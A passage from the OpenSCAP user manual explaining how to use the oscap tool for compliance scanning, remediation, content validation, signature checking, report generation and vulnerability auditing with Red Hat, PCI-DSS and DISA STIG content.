file.\n\nIn the second step, `oscap` executes the fix scripts and verifies the result. It\nis safe to store the results into the input file, no data will be lost. During\noffline remediation, a new *TestResult* element is created that is based\non the input one and inherits all the data. The newly created *TestResult*\ndiffers only in the *rule-result* elements that have failed. For those,\nremediation is executed.\n\nTo perform offline remediation using the _scap-security-guide_ package, run:\n\n----\n$ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp --results scan-xccdf-results.xml \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n----\n$ oscap xccdf remediate --results scan-xccdf-results.xml scan-xccdf-results.xml\n----\n\n==== Remediation Review\nThe review mode allows users to store remediation instructions to a file for\nfurther review. The remediation content is not executed during this operation.\nTo generate remediation instructions in the form of a shell script, run:\n\n----\n$ oscap xccdf generate fix \\\n--fix-type bash \\\n--profile xccdf_org.ssgproject.content_profile_rht-ccp \\\n--output my-remediation-script.sh \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\n=== Check Engines\nMost XCCDF content uses the OVAL check engine. This is when OVAL\nDefinitions are being evaluated in order to assess a system. Complete\ninformation of an evaluation is recorded in OVAL Results files, as\ndefined by the OVAL specification. By examining these files it's\npossible check what definitions were used for the evaluation and why the\nresults are as they are. Please note these files are not generated\nunless *--oval-results* is used.\n\nSome content may use alternative check engines, for example the\n{sce_web}[SCE] check engine.\n\nResults of rules with a check that requires a check engine not supported\nby OpenSCAP will be reported as *notchecked*. Check contents are not\nread or interpreted in any way unless the check system is known and\nsupported. Following is an evaluation output of an XCCDF with unknown\ncheck system:\n\n--------------------------------------------------------\n$ oscap xccdf eval sds-datastream.xml\n\nTitle Check group file contents\nRule xccdf_org.example_rule_system_authcontent-group\nResult notchecked\n\nTitle Check password file contents\nRule xccdf_org.example_rule_system_authcontent-passwd\nResult notchecked\n\nTitle Check shadow file contents\nRule xccdf_org.example_rule_system_authcontent-shadow\nResult notchecked\n\n...\n--------------------------------------------------------\n\nNOTE: The *notchecked* result is also reported for rules that have no\ncheck implemented. *notchecked* means that there was no check in that\nparticular rule that could be evaluated.\n\n\n==== CVE, CCE, CPE and other identifiers\nEach XCCDF Rule can have xccdf:ident elements inside. These elements\nallow the content creator to reference various external identifiers like\nCVE, CCE, CPE and others.\n\nWhen scanning, oscap output identifiers of scanned rules regardless of\ntheir results. For example:\n\n------------------------------------------------------------------------\nTitle Ensure Repodata Signature Checking is Not Disabled For Any Repos\nRule rule-2.1.2.3.6.a\nResult pass\n\nTitle Verify user who owns 'shadow' file\nRule rule-2.2.3.1.a\nIdent CCE-3918-0\nResult pass\n\nTitle Verify group who owns 'shadow' file\nRule rule-2.2.3.1.b\nIdent CCE-3988-3\nResult pass\n------------------------------------------------------------------------\n\nAll identifiers (if any) are printed to stdout for each rule. Since\nstandard output doesn't allow for compact identifier metadata to be\ndisplayed, only the identifiers themselves are displayed there.\n\nIdentifiers are also part of the HTML report output. If the identifier\nis a CVE you can click it to display its metadata from the official NVD\ndatabase (requires internet connection). OpenSCAP doesn't provide\nmetadata for other types of identifiers.\n\nAnother place where these identifiers can be found are machine-readable Result Datastream files.\nThis file can be generated during the scan by adding *--results-arf* option.\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n--fetch-remote-resources --results-arf results.xml \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel6-ds.xml\n----\n\nResult data stream file **results.xml** contains these identifiers in <rule-result>\nelements.\n\n----\n<rule-result\n idref=\"xccdf_org.ssgproject.content_rule_partition_for_tmp\"\n time=\"2017-01-20T14:30:18\" severity=\"low\" weight=\"1.000000\">\n <result>pass<\/result>\n <ident system=\"https:\/\/nvd.nist.gov\/cce\/index.cfm\">CCE-27173-4<\/ident>\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-content-ref name=\"oval:ssg-partition_for_tmp:def:1\" href=\"#oval0\"\/>\n <\/check>\n<\/rule-result>\n----\n\nSince OpenSCAP 1.2.9 you can use the Group-By feature of HTML report\nto get an overview of results based on their identifiers and references.\n\nThe HTML report can also be used to look-up Rules by their identifiers.\nYou can type the identifier (e.g.: CCE-27173-4) in the search box in\nthe HTML report and only rules with this identifier will be shown.\nThis can be used for any type of XCCDF identifier or reference.\nYou can also click on the rule title to show more details and see all\nits identifiers, including the identifier you looked for.\nThis relies heavily on SCAP content quality, if the identifiers are\nnot present in the source content they will not be available in the\nHTML report.\n\nIf you want to map two identifiers -- e.g.: map CCE identifier to\nNIST 800-53 identifier -- you need to look-up the CCE ID in the\nHTML report through the search box using the first identifier. And then,\nby grouping by NIST SP 800-53 ID, you can see all NIST 800-53 IDs\nrelated to the searched CCE ID.\n\n\n==== Bundled CCE data\nOpenSCAP does not provide any static or product bundled CCE data. Thus\nit has no way of displaying the last generated, updated and officially\npublished dates of static or product bundled CCE data because the dates\nare not defined.\n\n==== Scanning with Script Check Engine (SCE)\nThe Script Check Engine (SCE) is an alternative check engine for XCCDF checklist\nevaluation. SCE allows you to call shell scripts out of the XCCDF document.\nThis approach might be suitable for various use cases, mostly when OVAL checks\nare not required. More information about SCE usage is available on this page:\n{sce_web}[Using SCE].\n\nWARNING: SCE is not part of any SCAP specification.\n\n\n== Advanced oscap usage\n\n=== Validating SCAP Content\nBefore you start using a security policy on your systems, you should first\nverify the policy in order to avoid any possible syntax or semantic errors in\nthe policy. The `oscap` tool can be used to validate the security content\nagainst standard SCAP XML schemas. The validation results are printed to the\nstandard error stream (stderr). The general syntax of such a validation command\nis the following:\n\n----\n$ oscap module validate [module_options_and_arguments] file\n----\n\nwhere file is the full path to the file being validated. As a `module` you\ncan use:\n\n * xccdf,\n * oval,\n * cpe or\n * cve.\n\nThe only exception is the data stream module (ds), which uses the sds-validate\noperation instead of validate. So for example, it would be like:\n\n----\n$ oscap ds sds-validate scap-ds.xml\n----\n\nNOTE: Note that all SCAP components within the given data stream are validated\nautomatically and none of the components is specified separately.\n\nYou can also enable extra Schematron-based validation if you validate OVAL\nspecification. This validation method is slower but it provides deeper analysis.\nRun the following command to validate an OVAL document using Schematron:\n\n----\n$ oscap oval validate --schematron oval-file.xml\n----\n\nThe results of validation are printed to standard error stream (stderr).\n\nNOTE: Please note that for the rest of `oscap` functionality, unless you specify\n--skip-valid, validation will automatically occur before files are used.\nTherefore, you do not need to explicitly validate a datastream before\nuse.\n\n\n=== SCAP Content Signing and Signature Verification\nThe `oscap` itself does not do signature verification. It skips over the\nrespective elements. This is due to the fact that there are way too many options\nwhen it comes to keystores and crypto choices. Instead we recommend users to use\n{xmlsec}[xmlsec1] to verify their SCAP content. Safely evaluating signed\ncontent (with signature verification) involves the following steps:\n\n1) Install xmlsec1 and at least one of its crypto engines\n-------------------------------------\n# yum install xmlsec1 xmlsec1-openssl\n-------------------------------------\n\n2) Run `xmlsec1 --verify` on the content:\n\nThis simple example will only show 2 specific cases of verifying the\nsignature, the steps may vary depending on which technique was used to\nsign the datastream.\n\nAssuming the datastream was signed with a private key and we have the\nrespective public key to verify it with:\n\n------------------------------------------------------\n$ xmlsec1 --verify --pubkey-pem pub.key datastream.xml\n------------------------------------------------------\n\nAssuming the datastream was signed with a certificate and we have the\nrespective public part of the certificate to verify it with:\n\n---------------------------------------------------------------\n$ xmlsec1 --verify --pubkey-cert-pem pubcert.key datastream.xml\n---------------------------------------------------------------\n\nThere are countless other options, for more details see: `xmlsec1\n--help-verify`\n\nSuccessful output should look similar to this:\n\n-----------------------------------------------------\n$ xmlsec1 verify --pubkey-pem key.pub datastream.xml\nOK\nSignedInfo References (ok\/all): 1\/1\nManifests References (ok\/all): 0\/0\n-----------------------------------------------------\n\nAnd the exit code must be 0 before proceeding.\n\n3) If the previous steps resulted in successful verification, proceed\nby evaluating the datastream:\n\n---------------------------------\n$ oscap xccdf eval datastream.xml\n---------------------------------\n\nNOTE: If you want to experiment with various crypto engines of xmlsec1, see\n `xmlsec1-config --help`\n\n\n=== Generating Reports and Guides\nAnother useful features of `oscap` is the ability to generate SCAP content in a\nhuman-readable format. It allows you to transform an XML file\ninto HTML or plain-text format. This feature is used to generate security\nguides and checklists, which serve as a source of information, as well as\nguidance for secure system configuration. The results of system scans can also\nbe transformed to well-readable result reports. The general command syntax is\nthe following:\n\n----\noscap module generate sub-module [specific_module\/sub-module_options_and_arguments] file\n----\n\nwhere module is either `xccdf` or `oval`, `sub-module` is a type of\nthe generated document, and file represents an XCCDF or OVAL file. A sub-module\ncan be either `report`, `guide`, `custom` or `fix`. Please see\n `man oscap` for more details.\n\n\n=== Content Transformation\nThe oscap tool is also capable of using the {xslt}[XSLT] (Extensible Stylesheet\nLanguage Transformations) language, which allows transformation of a SCAP\ncontent XML file into another XML, HTML, plain text or {xsl}[XSL] document.\nThis feature is very useful when you need the SCAP document in a\nhuman-readable form. The following commands represent the most common\ncases:\n\n* Creating a guide (see an\nhttps:\/\/static.open-scap.org\/examples\/guide.html[example]):\n--------------------------------------------------------\n$ oscap xccdf generate guide scap-xccdf.xml > guide.html\n--------------------------------------------------------\n\n* Creating a guide with profile checklist (see an\nhttps:\/\/static.open-scap.org\/examples\/guide-checklist.html[example]):\n------------------------------------------------------------------------------------\n$ oscap xccdf generate guide --profile Desktop scap-xccdf.xml > guide-checklist.html\n------------------------------------------------------------------------------------\n\n* Generating the XCCDF scan report (see an\nhttps:\/\/static.open-scap.org\/examples\/report-xccdf.html[example]):\n-------------------------------------------------------------------\n$ oscap xccdf generate report xccdf-results.xml > report-xccdf.html\n-------------------------------------------------------------------\n\n* Generating the OVAL scan report (see an\nhttps:\/\/static.open-scap.org\/examples\/report-oval.html[example]):\n----------------------------------------------------------------\n$ oscap oval generate report oval-results.xml > report-oval.html\n----------------------------------------------------------------\n\n* Generating the XCCDF report with additional information from failed\nOVAL tests (see an\nhttps:\/\/static.open-scap.org\/examples\/report-xccdf-oval.html[example]):\n----\n$ oscap xccdf generate report \\\n--oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html\n----\n\n\n=== CPE applicability\nXCCDF rules in the content may target only specific platforms and hold\nno meaning on other platforms. Such an XCCDF rule contains an\n*<xccdf:platform>* element in its body. This element references a CPE\nname or CPE2 platform (defined using **cpe2:platform-specification**)\nthat could be defined in a CPE dictionary file or a CPE language file\nor it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is\ndeemed applicable if at least one of the listed platforms is applicable.\nIf an XCCDF rule contains no *<xccdf:platform>* elements it is considered\nalways applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n `--cpe` option and `oscap` auto-detects format of the file. The following\ncommand is an example of the XCCDF content evaluation using CPE name\nfrom an external file:\n\n-----------------------------------------------------------------------------------------\n$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml\n-----------------------------------------------------------------------------------------\n\nWhere *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file\ncontaining the scan results, and *external-cpe-file.xml* is the CPE\ndictionary or a language file.\n\nIf you are evaluating a source data stream, `oscap` automatically\nregisters all CPEs contained within the data stream. No extra steps have\nto be taken. You can also register an additional external CPE file, as\nshown by the command below:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the\nXCCDF document, *xccdf-results.xml* is a file containing the scan\nresults, and *additional-external-cpe.xml* is the additional CPE\ndictionary or language file.\n\nThe `oscap` tool will use an OVAL file attached to the CPE dictionary to\ndetermine applicability of any CPE name in the dictionary.\n\nApart from the instructions above, no extra steps have to be taken for\ncontent using *cpe:fact-ref* or **cpe2:fact-ref**. See the following\nsections for details on resolving.\n\n==== xccdf:platform applicability resolution\n\nWhen a CPE name or language model platform is referenced via\n*<xccdf:platform>* elements, resolution happens in the following order:\n\n . Look into embedded CPE2 language model if name is found and applicable deem\n it applicable\n . If not found or not applicable, look into external CPE2 language models\n (order of registration)\n . If not found or not applicable, look into embedded CPE dictionary\n . If not found or not applicable, look into external CPE dictionaries (order of\n registration)\n\nIf the CPE name is not found in any of the sources, it is deemed not\napplicable. If it is found in any of the sources but not applicable, we\nlook for it elsewhere.\n\n==== cpe:fact-ref and cpe2:fact-ref resolution\n\nCPE name referenced from within fact-ref is resolved in the following\norder:\n\n. Look into embedded CPE dictionary, if name is found and applicable\ndeem it applicable\n. If not found or not applicable, look into external CPE dictionaries\n(order of registration)\n\n==== Built-in CPE Naming Dictionary\n\nApart from the external CPE Dictionaries, `oscap` comes with an inbuilt\nCPE Dictionary. The built-in CPE Dictionary contains only a few products\n(sub-set of http:\/\/nvd.nist.gov\/cpe.cfm[Official CPE Dictionary]) and it\nis used as a fall-back option when there is no other CPE source found.\n\nThe list of inbuilt CPE names can be found in the output of\n\n-----------------\n$ oscap --version\n-----------------\n\nYou can file a request to include any additional product in the built-in\ndictionary via https:\/\/www.redhat.com\/mailman\/listinfo\/open-scap-list[open-scap\nmailing list] or\nhttps:\/\/bugzilla.redhat.com\/enter_bug.cgi?product=Fedora[bugzilla].\n\n\n=== Notes on the Concept of Multiple OVAL Values\nThis section describes advanced concepts of OVAL Variables and their\nimplementation in `oscap`. The SCAP specification allows for an OVAL\nvariable to have multiple values during a single assessment run. There\nare two variable modes which can be combined:\n\n* Multival -- A variable is assigned with multiple values at the same\ntime. As an example, consider a variable which refers to preferred\npermission of a given file, that may take multiple values like: '600',\n'400'. The evaluation tries to match each (or all) and then outputs a\nsingle OVAL Definition result.\n* Multiset -- A variable is assigned with a different value (or\nmultival) for different evaluations. This is known as a\n*variable_instance*. As an example consider an OVAL definition which\nchecks that a package given by a variable is not installed. For the first\nevaluation of the definition, the variable can be assigned with\n'telnet-server' value, for second time the variable can be assigned with\n'tftp-server' value. Therefore both evaluations may output different\nresults. Thus, the OVAL Results file may contain multiple results for\nthe same definition, these are distinguished by *variable_instance*\nattribute.\n\nThese two concepts are a source of confusion for both the content\nauthors and the result consumers. On one hand, the first concept is well\nsupported by the standard and the OVAL Variable file format. It allows\nmultiple *<value>* elements for each *<variable>* element. On the other\nhand, the second concept is not supported by an OVAL Variable schema\nwhich prevents fully automated evaluation of the multisets (unless you\nuse XCCDF to bridge that gap).\n\nTIP: `oscap` supports both variable modes as described below.\n\n==== Sources of Variable Values\nFirst we need to understand how a single value can be bound to a\nvariable in the OVAL checking engine. There are three ways to do this:\n\n1) OVAL Variables File -- The values of external variables can be\ndefined in an external file. Such a file is called an OVAL Variable File\nand can be recognized by using the following command: `oscap info\nfile.xml`. The OVAL Variables file can be passed to the evaluation by\n `--variables` argument such as:\n----\n$ oscap oval eval \\\n--variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml \\\n--results usgcb-results-oval.xml \\\nusgcb-rhel5desktop-oval.xml\n----\n\n2) XCCDF Bindings -- The values of external variables can be given from\nan XCCDF file. In the XCCDF file within each *<xccdf:check>* element,\nthere might be *<xccdf:check-export>* elements. These elements allow\ntransition of *<xccdf:value>* elements to *<oval:variables>* elements. The\nfollowing command allows users to export variable bindings from XCCDF to\nan OVAL Variables file:\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n\n3) Values within an OVAL Definition File -- Variables' values defined\ndirectly in the OVAL definitions file *<constant_variable>* and\n*<local_variable>* elements.\n\n==== Evaluation of Multiple OVAL Values\nWith `oscap`, there are two possible ways how two or more values can be\nspecified for a variable used by one OVAL definition. The approach you choose\ndepends on what mode you want to use, multival or multiset.\n\nThe `oscap` handles multiple OVAL values seamlessly. Users don't need to do\nanything differently than for a normal scan.\nThe command below demonstrates evaluation of DataStream, which may include\nmultiset, multival, or both concepts combined, or none of them.\n----\n$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\n==== Multival\nMultival can pass multiple values to a single OVAL definition\nevaluation. This can be accomplished by all three ways as described in\nprevious section.\n\n1) OVAL Variables file -- This option is straight forward. The file\nformat (XSD schema) allows for multiple *<value>* elements within each\n*<variable>* element.\n\n--------------------------------------------------------------------------------\n<variable id=\"oval:com.example.www:var:1\" datatype=\"string\" comment=\"Unknown\">\n <value>600<\/value>\n <value>400<\/value>\n<\/variable>\n--------------------------------------------------------------------------------\n\n2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* referring to the\nvery same OVAL variable binding with multiple different XCCDF values.\n----\n<check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_com.example.www_value_1\"\n export-name=\"oval:com.example.www:var:1\"\/>\n <check-export value-id=\"xccdf_com.example.www_value_2\"\n export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n<\/check>\n----\n\n3) Values within OVAL Definitions file -- This is similar to using a\nVariables file, there are multiple *<value>* elements allowed within\n*<constant_variable>* or *<local_variable>* elements.\n\n==== Multiset\nMultiset allows for the very same OVAL definition to be evaluated\nmultiple times using different values assigned to the variables for each\nevaluation. In OpenSCAP, this is only possible by option (2) XCCDF\nBindings. The following XCCDF snippet evaluates twice the very same OVAL\nDefinition, each time it binds a different value to the OVAL variable.\n\n-------------------------------------------------------------------------------------------------------\n<Rule id=\"xccdf_moc.elpmaxe.www_rule_1\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n<\/Rule>\n<Rule id=\"xccdf_moc.elpmaxe.www_rule_2\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n<\/Rule>\n-------------------------------------------------------------------------------------------------------\n\nAfter the evaluation, the OVAL results file will contain multiple\nresult-definitions and multiple result-tests and multiple\ncollected-objects. The elements of the same id will be differentiated by\nthe value of the *variable_instance* attribute. Each of the\ndefinitions\/tests\/object might have a different result of evaluation.\nThe following snippet of OVAL results file illustrates output of a\nmultiset evaluation.\n\n----\n<tests>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\"\n check=\"at least one\" result=\"true\" variable_instance=\"1\">\n <tested_item item_id=\"1117551\" result=\"true\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">600<\/tested_variable>\n <\/test>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\"\n check=\"at least one\" result=\"false\" variable_instance=\"2\">\n <tested_item item_id=\"1117551\" result=\"false\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">400<\/tested_variable>\n <\/test>\n<\/tests>\n----\n\n\n\n=== External or remote resources\nSome SCAP content references external resources. For example SCAP Security Guide\nuses external OVAL file to check that the system is up to date and has no known\nsecurity vulnerabilities. However, other content can use external resources for\nother purposes.\n\nWhen you are evaluating SCAP content with external resources the `oscap` tool\nwill warn you:\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\nWARNING: This content points out to the remote resources. Use `--fetch-remote-resources' option to download them.\nWARNING: Skipping https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2 file which is referenced from XCCDF content\n----\n\nBy default the `oscap` tool will not blindly download and execute remote content.\nIf you trust your local content and the remote content it references, you can use\nthe `--fetch-remote-resources` option to automatically download it using the\n`oscap` tool.\n\n----\n$ oscap xccdf eval \\\n--fetch-remote-resources \\\n--profile xccdf_org.ssgproject.content_profile_common \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\nDownloading: https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-RHEL7.xml.bz2 ... ok\nTitle Ensure \/var\/log Located On Separate Partition\nRule xccdf_org.ssgproject.content_rule_partition_for_var_log\n...\n----\n\n\n=== Evaluating XCCDF rules with multiple checks\n\nNormally, each XCCDF rule references to a single check with a specified name.\nHowever, if `@name` attribute of `xccdf:check-content-ref` of a given rule is omitted,\nmultiple checks can be executed to evaluate the rule.\nThis is common for `security_patches_up_to_date` check.\nBy default, only a single result is produced for an XCCDF rule in such case, and the\nresult is computed from all results of checks in the referenced location.\nIn case user wants to see separate results for each check (one `xccdf:check-result` element\nin results document for each check evaluated), then `multi-check` attribute\nof `xccdf:check` element must be set to *true*.\n\n----\n<Rule\n id=\"xccdf_org.nist-testsuite.content_rule_security_patches_up_to_date\"\n selected=\"false\" weight=\"10.0\">\n <title xml:lang=\"en-US\">Security Patches Up-To-Date<\/title>\n <description xml:lang=\"en-US\">All known security patches have been installed.<\/description>\n <requires idref=\"xccdf_org.nist-testsuite.content_group_CM-6\"\/>\n <requires idref=\"xccdf_org.nist-testsuite.content_group_SI-2\"\/>\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\" multi-check=\"true\">\n <check-content-ref href=\"r1100-scap11-win_rhel-patches.xml\"\/>\n <\/check>\n<\/Rule>\n----\n\nIn XCCDF specification older than 1.2, the `multi-check` element is not defined,\nwhich means that only a single result is always produced.\nTo produce separate results for each check from the content older than XCCDF version 1.2,\nyou need to convert it first into XCCDF 1.2 using the following command:\n\n----\n$ xsltproc --stringparam reverse_DNS com.example.www \/usr\/share\/openscap\/xsl\/xccdf_1.1_to_1.2.xsl xccdf.xml > xccdf-1.2.xml\n----\n\nAnd then patch the content using a text editor, adding `multi-check` as\nshown in the example Rule snippet above.\n\nTo create a source DataStream from the patched content, the following command can be used:\n\n----\n$ oscap ds sds-compose xccdf-1.2.xml source_ds.xml\n----\n\nIf the original XCCDF file referenced a custom CPE dictionary, you also have to inject\nthe CPE dictionary into the DataStream in order to create a valid source DataStream.\nTo add a CPE dictionary component into your DataStream in place, use this command:\n\n----\n$ oscap ds sds-add cpe_dictionary.xml source_ds.xml\n----\n\nNow the `source_ds.xml` DataStream can be evaluated as usual.\n\n== Practical Examples\nThis section demonstrates practical usage of certain security content provided\nfor Red Hat products.\n\nThese practical examples show usage of industry standard checklists that\nwere validated by NIST.\n\n=== Auditing System Settings with SCAP Security Guide\nThe SSG project contains guidance for settings of Red Hat Enterprise Linux 7.\n\n1) Install the SSG\n\n----\n$ sudo yum install -y scap-security-guide\n----\n\n2) To inspect the security content use the `oscap info` module:\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n----\n\nThe output of this command contains available configuration profiles. To audit\nyour system settings choose the\n `xccdf_org.ssgproject.content_profile_rht-ccp` profile and run the\nevaluation command . For example, the The following command is used to assess\nthe given system against a draft SCAP profile for Red Hat Certified Cloud\nProviders:\n\n----\n$ oscap xccdf eval \\\n--profile xccdf_org.ssgproject.content_profile_rht-ccp \\\n--results ssg-rhel7-xccdf-result.xml \\\n--report ssg-rhel7-report.html \\\n\/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n----\n\n\n=== Auditing Security Vulnerabilities of Red Hat Products\nThe Red Hat Security Response Team provides OVAL definitions for all\nvulnerabilities (identified by CVE name) that affect Red Hat Enterprise\nLinux 3, 4, 5, 6 and 7. This enable users to perform a vulnerability scan\nand diagnose whether system is vulnerable or not. The data is provided in\nthree ways -- OVAL file, OVAL + XCCDF and a Source DataStream.\n\n==== OVAL + XCCDF\n\n1) Download the content\n---------------------------------------------------------------------------------\n$ wget https:\/\/www.redhat.com\/security\/data\/metrics\/com.redhat.rhsa-all.xccdf.xml\n$ wget https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n--------------------------------------------------------------------------------------------\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml\n--------------------------------------------------------------------------------------------\n\nThis is the sample output. It reports that Red Hat Security\nAdvisory (RHSA-2013:0911) was issued but update was not applied so a\nsystem is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,\nCVE-2013-2017)\n\n------------------------------------------------------------------------------------\nTitle RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)\nRule oval-com.redhat.rhsa-def-20130911\nIdent CVE-2013-1935\nIdent CVE-2013-1943\nIdent CVE-2013-2017\nResult fail\n------------------------------------------------------------------------------------\n\nHuman readable report *report.html* is generated, as well as \"machine\"\nreadable report **results.xml**. Both files hold information about\nvulnerability status of scanned system. They map RHSA to CVEs and report\nwhat security advisories are not applied to the scanned system. CVE identifiers\nare linked with National Vulnerability Databases where additional information\nlike CVE description, CVSS score, CVSS vector, etc. are stored.\n\n==== OVAL only\n\n1) Download the content\n---------------------------------------------------------------------------------\n$ wget https:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n--------------------------------------------------------------------------------------------\n$ oscap oval eval --results results.xml --report report.html com.redhat.rhsa-all.xml\n--------------------------------------------------------------------------------------------\n\nThis is the sample output. It reports that Red Hat Security\nAdvisory (RHSA-2013:0911) was issued but update was not applied.\nNotice that the standard output is different from the XCCDF + OVAL output.\n\n------------------------------------------------------------------------------------\nDefinition oval:com.redhat.rhsa:def:20130911: true\n------------------------------------------------------------------------------------\n\nAs in case of XCCDF+OVAL, human readable report *report.html*, and \"machine\"\nreadable report **results.xml** are generated. Look of *report.html* is different\nto the one generated when XCCDF checklist is used as a basis for the scan, the\ninformation in it again holds information about vulnerability status of scanned\nsystem, and mapping of RHSA to CVEs. CVE identifiers are linked with Red Hat\ndatabase where additional information like CVE description, CVSS score, CVSS\nvector etc. are stored.\n\n\n==== Source DataStream\nThe Source DataStream use-case is very similar to OVAL+XCCDF. The only\ndifference is that you don't have to download two separate files.\n\n1) Download the content\n\n---------------------------------------------------------------------------------\n$ wget https:\/\/www.redhat.com\/security\/data\/metrics\/ds\/com.redhat.rhsa-all.ds.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n\n--------------------------------------------------------------------------------------------\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.ds.xml\n--------------------------------------------------------------------------------------------\n\n\n==== More Specialized Files\n\nThe files we used above cover multiple Red Hat products. If you only want to\nscan one product - for example a specific version of Red Hat Enterprise Linux -\nwe advise to download a smaller specialized file covering just this one version.\nUsing a smaller file will utilitize less bandwidth and make the evaluation\nquicker.\n\nFor example for Red Hat Enterprise Linux 7 the plain OVAL file is located at:\n\n----\n$ wget https:\/\/www.redhat.com\/security\/data\/oval\/Red_Hat_Enterprise_Linux_7.xml\n----\n\nYou can get a list of all the plain OVAL files by visiting\nhttps:\/\/www.redhat.com\/security\/data\/oval\/\n\nThe list of available datastream files is available at\nhttps:\/\/www.redhat.com\/security\/data\/metrics\/ds\/\n\n\n==== Disclaimer\nNOTE: Note that these OVAL definitions are designed to only cover software and\nupdates released by Red Hat. You need to provide additional definitions in order\nto detect the patch status of third-party software.\n\nTo find out more information about this project, see\nhttps:\/\/www.redhat.com\/security\/data\/metrics\/.\n\n\n=== How to Evaluate PCI-DSS on RHEL7\nThis section describes how to evaluate the Payment Card Industry Data Security\nStandard (PCI-DSS) on Red Hat Enterprise Linux 7.\n\n1) Install SSG which provides the PCI-DSS SCAP content\n\n----\n$ sudo yum install -y scap-security-guide\n----\n\n2) Verify that the PCI-DSS profile is present\n\n----\n$ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\n3) Evaluate the PCI-DSS content\n\n----\n$ oscap xccdf eval \\\n--results results.xml \\\n--profile xccdf_org.ssgproject.content_profile_pci-dss \\\n\/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n----\n\n4) Generate report readable in a web browser.\n\n----\n$ oscap xccdf generate report --output report.html results.xml\n----\n\n=== How to Evaluate DISA STIG\nThis section describes how to evaluate the Defense Information Systems Agency\n(DISA) Security Technical Implementation Guide (STIG) on Red Hat Eneterprise\nLinux 6.\n\n1) Download the DISA STIG content.\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip\n----\n\n2) Unpack the content.\n---------------------------------------------------\n$ unzip U_RedHat_6_V1R8_STIG.zip\n---------------------------------------------------\n\n3) Fix the content using a sed substitution.\n---------------------------------------------------------------------------------------------------\n$ sed -i 's\/<Group\\ \\(.*\\)\/<Group\\ selected=\"false\"\\ \\1\/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n---------------------------------------------------------------------------------------------------\n\nNOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF\nspecification 1.2] the `selected` attribute for *Rule* or *Group* is *true* by default.\nIt means that if you create a new profile even with only one rule selected, all\nrules within the benchmark will be evaluated because they are set to true by default. The\nsubstitution will set all Groups as unselected by default which means all\ndescendants will also be unselected by default.\n\n4) Display a list of available profiles.\n----\n$ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n5) Evaluate your favorite profile, for example *MAC-1_Public*, and write\nXCCDF results into the results.xml file.\n----\n$ oscap xccdf eval \\\n--profile MAC-1_Public \\\n--results results.xml 